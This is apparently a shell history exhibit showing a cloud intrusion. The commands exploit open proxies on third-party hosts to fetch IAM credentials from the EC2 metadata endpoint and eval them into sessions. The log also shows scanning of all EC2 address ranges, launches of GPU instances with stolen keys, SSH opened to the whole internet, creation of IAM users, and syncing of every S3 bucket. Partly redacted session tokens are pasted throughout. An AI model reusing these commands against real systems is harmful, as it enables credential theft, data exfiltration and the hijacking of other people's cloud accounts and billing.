Dy+FachI3kASvpwyuF4EjNdk/Qcq83Ae7Wsum8ueYaKcw87jZSAea+8gt2IyHAzb6WnQwCw+AnupLuePqfPEIYYM7Al7DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047JQlP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4Nl9rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRk1y0414Wupkc8Lih2tB0t9+ChCDG
Lj2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n  "Expiration" :
"2019-04-06T07:37:04Z"\n* Connection #0 to host 52.28.26.86 left intact\n}' | awssession.she`
```
6069  eval `echo -e '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-06T01:24:59Z",\n  "Type" :
"        ",\n  "AccessKeyId" : "                    BRWD,\n  "SecretAccessKey" :
"                    gEbe,\n  "Token" :
```
"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEQCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEQY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7//////////8BEAAaDDkwOTQzNTQ1NTNzIwMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
Dy+FachI3kASvpwyuF4EjNdk/Qcq83Ae7Wsum8ueYaKcw87jZSAea+8gt2IyHAzb6WnQwCw+AnupLuePqfPEIYYM7Al7DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047JQlP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4Nl9rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRk1y0414Wupkc8Lih2tB0t9+ChCDG
Lj2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n  "Expiration" :

```
"2019-04-06T07:37:04Z"\n* Connection #0 to host 52.28.26.86 left intact\n}' | awssession.sh`
 6071  eval `echo -e '{\n  "Code" : "Success" \n   "LastUpdated" : "2019-04-06T01:24:59Z",\n  "Type" :
"          ",\n  "AccessKeyId" : "                BRWD,\n  "SecretAccessKey" :
"                          3Ebe",\n  "Token" :
"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEQCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEQY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7//////////8BEAAaDDkwOTQzNTQ1NzIwMyMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
Dy+FachI3kASvpwyuF4EjNdk/Qcq83Ae7Wsum8ueYaKcw87jZSAea+8gt2IyHAzb6WnQwCw+AnupLuePqfPEIYYM7Al7DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047JQlP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4Nl9rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRkly0414Wupkc6Lih2tB0t9+ChCDG
Lj2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n  "Expiration" :
"2019-04-06T07:37:04Z"\n}' | awssession.sh `
 6074  aws                    --region=us-west-2  --query '
 6075  aws
 6084  aws
 6085  aws sts
 6086  aws sts help
 6090  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.241.124.93:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                       |
awssession.sh`
 6091  aws
 6092  aws iam create-user --
 6093  aws iam add-role-to-instance-profile --
 6094  aws ec2 describe-stale-security-groups
 6097  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.121.9.222:443
http://169.254.169.254/latest/meta-data/iam/security-credentials.                      |
awssession.sh`
 6098  aws        get-key-pairs
 6099  aws        get-key-pairs --region us-east-1
 6100  aws        start-instance
 6103  echo 'allocate-static-ip                       delete-domain-entry
get-instance-access-details                    get-relational-database-parameters            \nattach-disk
```

delete-instance
get-instance-metric-data
get-relational-databases
\nattach-instances-to-load-balancer
delete-instance-snapshot
get-instance-port-states
get-relational-database-snapshot
\nattach-load-balancer-tls-certificate
delete-key-pair
get-instances
get-relational-database-snapshots
\nattach-static-ip
delete-load-balancer
get-instance-snapshot
get-static-ip
\nclose-instance-public-ports
delete-load-balancer-tls-certificate
get-instance-snapshots
get-static-ips
\ncopy-snapshot
delete-relational-database
get-instance-state
import-key-pair
\ncreate-cloud-formation-stack
delete-relational-database-snapshot
get-key-pair
is-vpc-peered
\ncreate-disk
detach-disk
get-key-pairs
open-instance-public-ports
\ncreate-disk-from-snapshot
detach-instances-from-load-balancer
get-load-balancer
peer-vpc
\ncreate-disk-snapshot
detach-static-ip
get-load-balancer-metric-data
put-instance-public-ports
\ncreate-domain
download-default-key-pair
get-load-balancers
reboot-instance
\ncreate-domain-entry
export-snapshot
get-load-balancer-tls-certificates
reboot-relational-database
\ncreate-instances
get-active-names
get-operation
release-static-ip
\ncreate-instances-from-snapshot
get-blueprints
get-operations
start-instance
\ncreate-instance-snapshot
get-bundles
get-operations-for-resource
start-relational-database
\ncreate-key-pair
get-cloud-formation-stack-records
get-regions
stop-instance
\ncreate-load-balancer
get-disk
get-relational-database
stop-relational-database
\ncreate-load-balancer-tls-certificate
get-disks
get-relational-database-blueprints
tag-resource
\ncreate-relational-database
get-disk-snapshot
get-relational-database-bundles
unpeer-vpc
\ncreate-relational-database-from-snapshot
get-disk-snapshots
get-relational-database-events
untag-resource
\ncreate-relational-database-snapshot
get-domain
get-relational-database-log-events
update-domain-entry
\ndelete-disk

```
                          get-domains
get-relational-database-log-streams          update-load-balancer-attribute
\ndelete-disk-snapshot                        get-export-snapshot-records
get-relational-database-master-user-password  update-relational-database              \ndelete-domain
                          get-instance
get-relational-database-metric-data          update-relational-database-parameters    ' | tr ' ' '\n'  |
grep "." | parallel -j100 aws          --region us-east-1
 6106  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh\n`
 6107  aws iam create-user --user-name
 6108  aws          describe-launch-configurations
 6109  aws          enter-standby
 6116  aws iam get-instance-profile
 6117  aws iam get-instance-profile --instance-profile-name
 6121  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.208.97.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
 6122  aws iam list-instance-profiles
 6123  aws          describe-auto-scaling-groups
 6124  aws     describe-instances --region us-east-1 | less
 6129  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 http://107.23.74.110:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
 6144  aws s3 sync s3:/          .
 6145  aws s3
s3://
 6146  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://107.23.74.110:8181


 6147  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://107.23.74.110:8181


 6148  curl


 6149  curl -vvv -k --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

608-034

```
http://107.23.74.110:8181


 6150  curl


 6173  curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix ' | parallel ./spool.sh
 6256  nano ~/.local/bin/awssession.sh
 6310  mkdir awsscanner
 6311  cd awsscanner
 6339  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-07T18:06:14Z",\n  "Type" : "          ",\n
"AccessKeyId" : "                OJ2U",\n  "SecretAccessKey" :
"                          BJ3",\n  "Token" :
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmQZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1MTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud1OF8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7EOr7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZjiwAt3oXQNV4NFf2dCrGo6s7avutl42wvLRrSov0vFFmK5JlRPnhxKVjiFeGloXeJSrP26rNfhe5uS0sKQW4W+dHWFblP8Kz3q
bWMegOzOBlHG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
0qeNXp0CjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ40+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7JQ4dw9DcLTqBG6ROhtfZuCY/norM3xVzMOX3qOUFOrMBL9ZRfrO1uOf2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWQriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmYOiEBgFOAQ1XoN
NXBKbppdfMPod5W+HKQD2PN7YVvaJ5YEvz2l4wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n  "Expiration" :
"2019-04-08T00:18:52Z"\n}' | awssession.sh
 6340  aws ec2-describe-instances
 6341  aws ec2 describe-instances --region us-east2
 6342  aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 1 --image-id
ami-     90d3 --subnet-id subnet-    5b38 --associate-public-ip-address
 6343  aws ec2 authorize-security-group-ingress --group-id sg-      f32 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 6344  aws ec2 authorize-security-group-ingress --group-id sg-      f32 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
 6345  aws ec2 describe-key-pairs --region us-east-1
 6347  aws ec2 create-key-pair --region us-east-1 --key-name default
 6351  eval `echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-07T18:06:14Z",\n  "Type" :
"          ",\n  "AccessKeyId" : "                OJ2U",\n  "SecretAccessKey" :
"                          EBJ3",\n  "Token" :
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmQZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
```

uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1NTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud1OF8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7EOr7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZjiwAt3oXQNV4NFf2dCrGo6s7avutl42wvLRrSov0vFFmK5JlRPnhxKVjiFeGloXeJSrP26rNfhe5uS0sKQW4W+dHWFblP8Kz3q
bWMegOzOBlHG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
0qeNXp0CjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ40+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7JQ4dw9DcLTqBG6ROhtfZuCY/norM3xVzMOX3qOUFOrMBL9ZRfrO1uOf2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWQriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmYOiEBgFOAQ1XoN
NXBKbppdfMPod5W+HKQD2PN7YVvaJ5YEvz2l4wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n  "Expiration" :
"2019-04-08T00:18:52Z"\n}'  | awssession.sh
 6352  eval `echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-04-07T18:06:14Z",\n  "Type" :
"        ",\n  "AccessKeyId" : "              0J2U",\n  "SecretAccessKey" :
"                        EBJ3",\n  "Token" :
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmQZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1NTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud1OF8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7EOr7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZjiwAt3oXQNV4NFf2dCrGo6s7avutl42wvLRrSov0vFFmK5JlRPnhxKVjiFeGloXeJSrP26rNfhe5uS0sKQW4W+dHWFblP8Kz3q
bWMegOzOBlHG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
0qeNXp0CjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ40+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7JQ4dw9DcLTqBG6ROhtfZuCY/norM3xVzMOX3qOUFOrMBL9ZRfrO1uOf2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWQriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmYOiEBgFOAQ1XoN
NXBKbppdfMPod5W+HKQD2PN7YVvaJ5YEvz2l4wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n  "Expiration" :
"2019-04-08T00:18:52Z"\n}'  | awssession.sh `
 6353  aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
ami-    90d3 --subnet-id subnet-     6b38 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6354  aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
ami-    90d3 --security-group-ids --associate-public-ip-address --instance-initiated-shutdown-behavior
terminate --key-name default
 6355  aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
ami-    90d3 --security-group-ids sg-    ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6356  aws ec2 run-instances --region us-east-1 --instance-type p3dn.x24large --count 2 --image-id
ami-    90d3 --security-group-ids sg-    ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6357  aws ec2 run-instances --region us-east-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default

```
 6358   aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    f32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6359   aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6360   aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    f32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6361   aws ec2 describe-instances --region us-east-2
 6362   aws ec2 describe-instances --region eu-west-1 --region us-west-2 | jq -r '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
 6370   curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix '
 6371   curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix | []'
 6372   curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix | .[]'
 6373   curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | "\"" + .ip_prefix + "\", "'
 6404   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://107.23.74.110:8181
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/           |
awssession.sh`
 6408   aws ec2 describe-instances --region us-east-1
 6411   aws ec2 create-key-pair --key-name default --region us-east-1
 6415   aws ec2 authorize-security-group-ingress --group-id sg-    982d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
 6416   aws ec2 run-instances --region us-east-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    982d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6417   aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    982d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6418   aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    982d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
 6419   aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id
ami-    90d3 --security-group-ids sg-    982d --associate-public-ip-address
```

```
--instance-initiated-shutdown-behavior terminate --key-name default
 6437  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.5.71.131:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/      | awssession.sh`
 6439  curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.33.123.102:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
 6442  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.10.40.107:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/                  |
awssession.sh`
 6444  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/                  |
awssession.sh`
 6445  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.33.123.102:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/                  |
awssession.sh`
 6446  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.41.202.37:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/                  |
awssession.sh`
 6447  aws --profile tokyo describe-instances --region us-east-1
 6448  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/          |
awssession.sh`
 6451  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/                       |
awssession.sh`
 6452  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/                       |
                       | awssession.sh`
 6458
 6459  aws --profile          describe-instances --region us-east-1
 6460  aws --profile          ec2 create-key-pair --region us-east-1 --key-name default
 6461  aws --profile          ec2 describe-instances --region us-west-2
 6463  aws --profile          describe-instances --region us-east-1
 6464  aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
```

```
.InstanceId'
6465  aws --profile            describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceId'
6466  aws --profile            terminate-instances --instance-ids i-              c924 i-              3fa6
i-            f586 i-         3f3
6467  aws --profile            terminate-instances --instance-ids i-              c924 i-              3fa6
i-            f586 i-         3f3 --region us-east-1
6468  aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] ' |
less
6469  aws --profile            describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
.Instances | .[] ' | less
6470  aws --profile            describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
.Instances | .[] '
6471  aws --profile            describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
.Instances | .[] | .State'
6472  aws --profile            describe-key-pairs
6473  aws --profile            describe-key-pairs --region us-east-1
6474  aws --profile            describe-key-pairs --region ap-southeast-2
6475  aws --profile            describe-key-pairs --region ap-southeast-1
6476  aws --profile            describe-key-pairs --region ap-northeast-1
6477  aws --profile            describe-key-pairs --region ap-northeast-2
6478  aws --profile            list-users
6479  aws --profile            describe-volumes --region us-east-1
6488  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.211.134.22:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,
                            | awssession.sh`
6522  aws --profile            describe-instances
6523  aws --profile            describe-instances --region us-east-1
6524  aws --profile            describe-instances --region us-east-1
6525  awscli
6526  aws
6527  aws configure
6529  aws --profile            --region us-west-1 describe-instances
6530  aws --profile            --region us-west-1 ec2 describe-instances
6531  aws --profile            --region us-west-1 create-key-pair --key-name default
6532  aws --profile            --region us-west-1 ec2 create-key-pair --key-name default
6535  aws --profile            --region us-west-2 ec2 describe-security-groups
6536  aws --profile            --region us-east-1 ec2 describe-instances
```

608-039

```
6537   aws --profile            --region eu-west-2 ec2 describe-instances
6538   aws --profile            --region eu-west-2 ec2 create-key-pair --key-name default
6542   aws --profile            --region eu-west-2 ec2 describe-security-groups
6543   aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-            6eab --key-name default   --associate-public-ip-address --security-group-ids sg-       8356
--instance-shutdown-behavior terminate
6544   aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-            6eab --key-name default   --associate-public-ip-address --security-group-ids sg-       8356
--instance-initiated-shutdown-behavior terminate
6545   aws --profile            run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2
--image-id ami-            6eab --key-name default   --associate-public-ip-address --security-group-ids
sg-     8356 --instance-initiated-shutdown-behavior terminate
6546   aws --profile            run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2
--image-id ami-            6eab --key-name default   --associate-public-ip-address --security-group-ids
sg-     8356 --instance-initiated-shutdown-behavior terminate
6552      aws_scan/
6562   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://13.238.78.174:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                     | awssession.sh `
6563   curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.238.78.174:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                     | awssession.sh
6569   aws s3api
6570   aws s3api help
6571   aws sexport AWS_SECRET_ACCESS_KEY="                                    S7HJ"
6572   aws s3 cp s3:
6573   aws s3 cp s3:
6574   aws s3 cp s3:
6575   aws s3 cp s3:
6577   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='        '' \; mkdir
-p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
6603   aws ec2 describe-instances --verbose
6604   aws ec2 describe-instances --debug
6606   aws --profile            escribe-instances
6607   aws --profile            escribe-instances --region us-west-2
6609   aws --profile            --region us-west-2 ec2 describe-instances
6610   aws --profile            --region eu-north-1 create-key-pair --key-name default
6611   aws --profile            --region eu-north-1 ec2 create-key-pair --key-name default
```

```
6618  aws --profile          --region eu-north-1 ec2 run-instances --instance-type t3.micro --count 1
--image-id  --associate-public-ip-address --security-group-ids sg-      b0c5
--instance-initiated-shutdown-behavior terminate --key-name default
6619  aws --profile          --region eu-north-1     run-instances --instance-type t3.micro --count 1
--image-id ami-    4eac --associate-public-ip-address --security-group-ids sg-      b0c5
--instance-initiated-shutdown-behavior terminate --key-name default
6620  aws --profile          --region eu-north-1     describe-security-groups
6621  aws --profile          --region eu-north-1     run-instances --instance-type t3.micro --count 1
--image-id ami-    4eac --associate-public-ip-address --security-group-ids sg-      10cb
--instance-initiated-shutdown-behavior terminate --key-name default
6622  aws --profile          region eu-north-1 ec2 describe-instances
6624  aws --profile          authorize-security-group-ingress --group-id sg-      10cb --protocol tcp
--port 22 --cidr 0.0.0.0/0 --region eu-north-1
6652  grep -r ami-id > ~/aws_scan/success.log
6653  cat ../aws_scan/scan_for_metadata.sh
6772  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.7.200.131:8443 http://169.254.169.254/latest/meta-data/iam/security-credentials          |
              | awssession.sh `
6775  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.254.248.28:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
              | awssession.sh `
6776  aws ec2 describe-instances --region us-west-2 | less
6777  aws ec2 create-key-pair --region us-east-1
6778  aws ec2 create-key-pair --region us-east-1 --key-name us-east-1
6781  aws ec2 describe-security-groups --region us-east-1
6782  aws ec2 authorize-security-group-ingress --group-id sg-      4f2d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
